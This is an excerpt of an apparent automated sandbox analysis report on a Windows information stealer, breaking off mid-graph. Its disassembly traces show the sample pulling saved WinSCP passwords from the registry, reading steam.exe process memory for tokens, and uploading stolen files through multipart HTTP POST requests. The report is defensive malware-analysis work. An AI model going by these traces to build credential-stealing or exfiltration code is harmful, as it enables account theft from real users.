                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2951B4B0A45750AFD711AF25FD42B257AA3EB80705354203FB902A71F3DBBA5450AFE8
                                                                                                                                                                                                                                                                          Function 0040D9C0 Relevance: 45.9, APIs: 11, Strings: 15, Instructions: 370registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1783 40d9c0-40da5d memset * 4 RegOpenKeyExA 1784 40daa2-40dac8 call 410230 * 4 1783->1784 1785 40da5f-40da87 RegGetValueA 1783->1785 1786 40da89-40da8c 1785->1786 1787 40da8e-40da95 1785->1787 1789 40da97-40da99 1786->1789 1787->1789 1790 40dacb-40dacd 1787->1790 1789->1784 1792 40da9b 1789->1792 1794 40dadd-40daf4 RegOpenKeyExA 1790->1794 1795 40dacf-40dad6 1790->1795 1792->1784 1794->1784 1796 40daf6-40db22 1794->1796 1795->1794 1796->1786 1803 40db28-40db3e call 4101c0 1796->1803 1807 40dbb2-40dc51 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA 1803->1807 1827 40dc53-40dc6a call 410340 call 410290 1807->1827 1828 40dc6c-40dc90 call 411ea0 call 4102e0 call 410290 call 410230 1807->1828 1838 40dc92-40dd5c call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 RegGetValueA call 410340 call 410290 call 410230 1827->1838 1828->1838 1870 40dd62-40dd80 call 40d250 1838->1870 1871 40db4b-40dbac call 410340 call 410290 call 410230 1838->1871 1876 40dd82 1870->1876 1877 40dd85-40dda9 call 410340 call 410290 call 410230 1870->1877 1871->1807 1889 40dde4-40de5c call 410530 * 2 call 4101c0 call 406f80 call 413e50 call 410230 1871->1889 1876->1877 1877->1871 1890 40ddaf-40ddbe 1877->1890 1911 40de6c-40de77 call 410230 1889->1911 1912 40de5e-40de65 1889->1912 1892 40db42-40db48 ??3@YAXPAX@Z 1890->1892 1893 40ddc4-40ddc6 1890->1893 1892->1871 1895 40ddc8-40ddcd 1893->1895 1896 40dddf _invalid_parameter_noinfo_noreturn 1893->1896 1895->1896 1897 40ddcf-40ddd4 1895->1897 1896->1889 1897->1896 1899 40ddd6-40ddd9 1897->1899 1899->1896 1901 40db40 1899->1901 1901->1892 1911->1784 1912->1911
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memset$Value$Open$??3@_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                          • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                          • API String ID: 1569661976-2564332296
                                                                                                                                                                                                                                                                          • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                          • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9
                                                                                                                                                                                                                                                                          Function 0040FD50 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 324stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1916 40fd50-40fd9c ??_U@YAPAXI@Z OpenProcess 1917 40fda2-40fde2 memset 1916->1917 1918 40ff2d-40ff3b 1916->1918 1920 40fe26-40fe2f call 40f9b0 1917->1920 1919 40ff3f-40ff46 1918->1919 1921 40ff48-40ff58 1919->1921 1922 40ff8c-40ff98 1919->1922 1929 40fe35-40fe4a 1920->1929 1930 40ff1b-40ff26 ??_V@YAXPAX@Z 1920->1930 1924 40ff83-40ff89 ??3@YAXPAX@Z 1921->1924 1925 40ff5a-40ff5c 1921->1925 1924->1922 1927 40ff62-40ff67 1925->1927 1928 410044-410094 _invalid_parameter_noinfo_noreturn call 411ed0 call 40fd50 ??_U@YAPAXI@Z strcpy 1925->1928 1927->1928 1931 40ff6d-40ff72 1927->1931 1946 4100c7-4100d0 1928->1946 1947 410096-4100a2 1928->1947 1933 40fe5c-40fe64 1929->1933 1934 40fe4c-40fe56 ReadProcessMemory 1929->1934 1930->1918 1931->1928 1935 40ff78-40ff7b 1931->1935 1937 40fe80 1933->1937 1938 40fe66-40fe6f strlen 1933->1938 1934->1933 1935->1928 1940 40ff81 1935->1940 1939 40fe82-40fe95 call 402400 1937->1939 1938->1939 1948 40fdf9-40fe25 memset 1939->1948 1949 40fe9b-40feaf call 40f780 1939->1949 1940->1924 1950 4100a4-4100a7 1947->1950 1951 4100be-4100c4 ??3@YAXPAX@Z 1947->1951 1948->1920 1959 40feb1-40fec4 call 4053f0 1949->1959 1960 40feca-40fed1 1949->1960 1953 4100d1-4100e7 _invalid_parameter_noinfo_noreturn 1950->1953 1954 4100a9-4100ae 1950->1954 1951->1946 1956 410163-410166 1953->1956 1957 4100e9-4100f0 1953->1957 1954->1953 1958 4100b0-4100b5 1954->1958 1961 410110-410123 1957->1961 1962 4100f2-4100ff 1957->1962 1958->1953 1963 4100b7-4100ba 1958->1963 1959->1960 1974 40ff9b-40ffad 1959->1974 1960->1948 1965 40fed7-40fee7 1960->1965 1967 410125-41012a 1961->1967 1968 410167-41019b _invalid_parameter_noinfo_noreturn atexit 1961->1968 1962->1961 1963->1953 1966 4100bc 1963->1966 1970 40fdf0-40fdf6 ??3@YAXPAX@Z 1965->1970 1971 40feed-40feef 1965->1971 1966->1951 1972 410146-41015c ??3@YAXPAX@Z 1967->1972 1973 41012c-41012f 1967->1973 1970->1948 1971->1928 1975 40fef5-40fefa 1971->1975 1972->1956 1973->1968 1976 410131-410136 1973->1976 1977 40ffd0-40ffdf 1974->1977 1978 40ffaf-40ffbb 1974->1978 1975->1928 1979 40ff00-40ff05 1975->1979 1976->1968 1980 410138-41013d 1976->1980 1981 40ffe3-410005 1977->1981 1978->1981 1982 40ffbd-40ffce memcpy 1978->1982 1979->1928 1983 40ff0b-40ff0e 1979->1983 1980->1968 1985 41013f-410142 1980->1985 1981->1919 1984 41000b-41001b 1981->1984 1982->1981 1983->1928 1986 40ff14-40ff16 1983->1986 1987 410036-41003f ??3@YAXPAX@Z 1984->1987 1988 41001d-41001f 1984->1988 1985->1968 1989 410144 1985->1989 1986->1970 1987->1919 1988->1928 1990 410021-410026 1988->1990 1989->1972 1990->1928 1991 410028-41002d 1990->1991 1991->1928 1992 41002f-410032 1991->1992 1992->1928 1993 410034 1992->1993 1993->1987
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FE01
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F9B0: strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F9B0: ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F9B0: memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F9B0: VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FF1E
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040FF84
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,0000012E,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 0040FFC4
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,N0ZWFt,00000000,?,?,?,?,?,00000000), ref: 00410037
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410044
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                          • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??3@memset$Processstrlen$MemoryOpenQueryReadVirtual_invalid_parameter_noinfo_noreturnmemcpystrcpy
                                                                                                                                                                                                                                                                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73$@Gc$N0ZWFt$steam.exe
                                                                                                                                                                                                                                                                          • API String ID: 2915318159-3068576885
                                                                                                                                                                                                                                                                          • Opcode ID: 91d3c441bb8c7061a24bbe581b1c9e4260f77e48f0fdc8ce8835b4f4c0e4bd54
                                                                                                                                                                                                                                                                          • Instruction ID: 0ac8410772c06d3c7cd158b0f29ba11351ce6fbe5d6182cbcead23e9eae0fd7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91d3c441bb8c7061a24bbe581b1c9e4260f77e48f0fdc8ce8835b4f4c0e4bd54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AA125B16043015BDB20AA24DD84BAFBAD5AF41304F10093FF946976C2E7BD99C8839E
                                                                                                                                                                                                                                                                          Function 00403090 Relevance: 39.2, APIs: 8, Strings: 14, Instructions: 682networkmemorysleepCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1994 403090-40317c call 4101c0 call 410200 call 402790 call 4116b0 call 410530 * 2 call 4116b0 call 4101c0 * 4 2019 4031ab-403298 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 call 410340 call 4102e0 call 410290 call 410230 * 2 1994->2019 2020 40317e-4031a5 call 410530 1994->2020 2028 40386c-4038ae call 411250 * 2 call 4104e0 * 4 call 410200 2019->2028 2092 40329e-4032d5 2019->2092 2020->2019 2020->2028 2059 4038c0-403913 call 410230 * 9 2028->2059 2095 403865 2092->2095 2096 4032db-4032e6 2092->2096 2095->2028 2097 403300-403718 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410530 * 2 RtlAllocateHeap call 410530 * 2 memcpy call 410530 memcpy call 410530 * 3 memcpy 2096->2097 2098 4032e8-4032f7 2096->2098 2304 403720-403754 call 410530 * 2 HttpSendRequestA 2097->2304 2098->2097 2310 403780-4037ac call 411250 2304->2310 2311 403756-403769 Sleep 2304->2311 2319 4038b0-4038bd call 4101c0 2310->2319 2320 4037b2-4037bd call 411220 2310->2320 2313 403770-40377b call 411250 2311->2313 2314 40376b-40376e 2311->2314 2313->2319 2314->2304 2314->2313 2319->2059 2320->2319 2325 4037c3-4037de InternetReadFile 2320->2325 2326 4037e0-4037e5 2325->2326 2327 403834-40384c call 410530 2325->2327 2326->2327 2329 4037e7-4037ea 2326->2329 2335 403856-403862 InternetCloseHandle 2327->2335 2336 40384e 2327->2336 2331 4037f0-40382b call 410340 call 410290 call 410230 2329->2331 2331->2327 2342 40382d-403832 2331->2342 2335->2095 2336->2335 2342->2327 2342->2331
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?,?,?,00416A04,?,?,00416A04), ref: 004028FA
                                                                                                                                                                                                                                                                            • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                            • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037D6
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403859
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internetmemcpy$AllocateHeap$CloseCrackErrorFileHandleHttpLastReadRequestSendSleep
                                                                                                                                                                                                                                                                          • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token
                                                                                                                                                                                                                                                                          • API String ID: 2263215810-2620489619
                                                                                                                                                                                                                                                                          • Opcode ID: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                          • Instruction ID: bceff4d112c07ef55503c2bfa5bbc07c75ab0ef13ec91c0f48555253a5be1088
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A2263307105286BDB05BBA19C96AFF67699F84748F40006EF4066B281DFBC5EC687ED
                                                                                                                                                                                                                                                                          Function 00403920 Relevance: 30.4, APIs: 6, Strings: 11, Instructions: 633networkfilesleepCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3453 403920-4039d0 call 410200 call 402790 call 4101c0 * 5 call 410530 3472 404010-404031 call 410530 call 407790 3453->3472 3473 4039d6-403b13 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 3453->3473 3486 404081-404098 call 411250 * 2 call 410200 3472->3486 3487 404033-40407e call 410240 call 410340 call 410290 call 410230 3472->3487 3473->3472 3568 403b19-403b56 3473->3568 3504 40409d-4040f6 call 410230 * 10 3486->3504 3487->3486 3570 404006-40400d 3568->3570 3571 403b5c-403b61 3568->3571 3570->3472 3572 403b63-403b72 3571->3572 3573 403b7b-403e45 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410530 * 2 3571->3573 3572->3573 3723 403f35-403f5d call 4101c0 3573->3723 3724 403e4b-403eb3 call 410530 * 2 memcpy call 410530 * 3 memcpy 3573->3724 3723->3504 3743 403ec0-403ef4 call 410530 * 2 3724->3743 3750 403f62-403f7d call 411250 3743->3750 3751 403ef6-403f09 Sleep 3743->3751 3760 403f80-403f9b InternetReadFile 3750->3760 3752 403f10-403f33 call 411250 3751->3752 3753 403f0b-403f0e 3751->3753 3752->3723 3752->3760 3753->3743 3753->3752 3762 403ff7-404003 InternetCloseHandle 3760->3762 3763 403f9d-403fa2 3760->3763 3762->3570 3763->3762 3764 403fa4-403fa7 3763->3764 3765 403fb0-403fee call 410340 call 410290 call 410230 InternetReadFile 3764->3765 3765->3762 3772 403ff0-403ff5 3765->3772 3772->3762 3772->3765
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?,?,?,00416A04,?,?,00416A04), ref: 004028FA
                                                                                                                                                                                                                                                                            • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000000C7,?,?,?,?,?,?,?,?,?,00421505,?,?,?), ref: 00403F93
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,000000C7,?,?,?,00000000,?,?,?,?,?,?,?,?,00421505), ref: 00403FE6
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403FFA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$FileReadmemcpy$CloseCrackHandleSleeplstrlen
                                                                                                                                                                                                                                                                          • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token
                                                                                                                                                                                                                                                                          • API String ID: 317031563-3466435155
                                                                                                                                                                                                                                                                          • Opcode ID: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                          • Instruction ID: 5b37cdde6ef0ecb750ac5b7d415ead0f9e62264991208947704b3bc77561ae75
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1312523171011867CB15BBA29C9AAFF6B6A9FC4704F40005EF4066B291DFBC5DC6C7A9
                                                                                                                                                                                                                                                                          Function 00404EA0 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 354filestringnetworkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 4068 404ea0-404ed3 call 41e9b0 4072 404f12-404f33 call 402400 4068->4072 4073 404ed5-404ee1 4068->4073 4081 405332-40533c 4072->4081 4074 404ee3-404eed 4073->4074 4075 404f38-404f44 4073->4075 4077 404ef0-404f0e 4074->4077 4079 404f50-404f6e 4075->4079 4077->4077 4080 404f10 4077->4080 4079->4079 4082 404f70 4079->4082 4083 404f75-404f8d 4080->4083 4082->4083 4084 404fa7-404fc6 call 40ee20 4083->4084 4085 404f8f-404fa2 call 402400 4083->4085 4089 404fe8-404ff4 4084->4089 4090 404fc8-404fd3 4084->4090 4085->4084 4092 404ff7-40502f call 406b00 4089->4092 4091 404fd5-404fe6 memcpy 4090->4091 4090->4092 4091->4092 4095 405051-40505d 4092->4095 4096 405031-40503c 4092->4096 4097 405060-405083 4095->4097 4096->4097 4098 40503e-40504f memcpy 4096->4098 4099 405085-405095 4097->4099 4100 4050c9-4050e5 4097->4100 4098->4097 4103 4050c0-4050c6 ??3@YAXPAX@Z 4099->4103 4104 405097-405099 4099->4104 4101 4050e7-4050f7 4100->4101 4102 40512b-405130 4100->4102 4105 405122-405128 ??3@YAXPAX@Z 4101->4105 4106 4050f9-4050fb 4101->4106 4107 405132-405136 4102->4107 4108 405138 4102->4108 4103->4100 4109 40533f-405344 _invalid_parameter_noinfo_noreturn 4104->4109 4110 40509f-4050a4 4104->4110 4105->4102 4106->4109 4111 405101-405106 4106->4111 4112 40513c-40515a 4107->4112 4108->4112 4110->4109 4113 4050aa-4050af 4110->4113 4111->4109 4114 40510c-405111 4111->4114 4120 405160-40518b InternetReadFile 4112->4120 4121 405261-40528e call 402400 4112->4121 4113->4109 4115 4050b5-4050b8 4113->4115 4114->4109 4116 405117-40511a 4114->4116 4115->4109 4118 4050be 4115->4118 4116->4109 4119 405120 4116->4119 4118->4103 4119->4105 4122 4051e5-405208 call 4053f0 4120->4122 4123 40518d-405193 4120->4123 4132 4052f3-4052fa 4121->4132 4143 405290 4122->4143 4144 40520e-405227 call 4053f0 4122->4144 4123->4122 4124 405195-405199 4123->4124 4126 4051a0-4051aa 4124->4126 4129 4051c0 4126->4129 4130 4051ac-4051b5 strlen 4126->4130 4133 4051c2-4051db call 406b00 4129->4133 4130->4133 4137 405330 4132->4137 4138 4052fc-40530c 4132->4138 4133->4122 4153 4051dd-4051e3 4133->4153 4137->4081 4141 405327-40532d ??3@YAXPAX@Z 4138->4141 4142 40530e-405310 4138->4142 4141->4137 4142->4109 4145 405312-405317 4142->4145 4146 405297-4052b1 call 402400 4143->4146 4144->4146 4156 405229-405240 call 4053f0 4144->4156 4145->4109 4149 405319-40531e 4145->4149 4155 4052b6-4052bd 4146->4155 4149->4109 4150 405320-405323 4149->4150 4150->4109 4154 405325 4150->4154 4153->4122 4153->4126 4154->4141 4155->4132 4157 4052bf-4052cf 4155->4157 4156->4146 4163 405242-40525f call 40ed20 4156->4163 4159 4052d1-4052d3 4157->4159 4160 4052ea-4052f0 ??3@YAXPAX@Z 4157->4160 4159->4109 4162 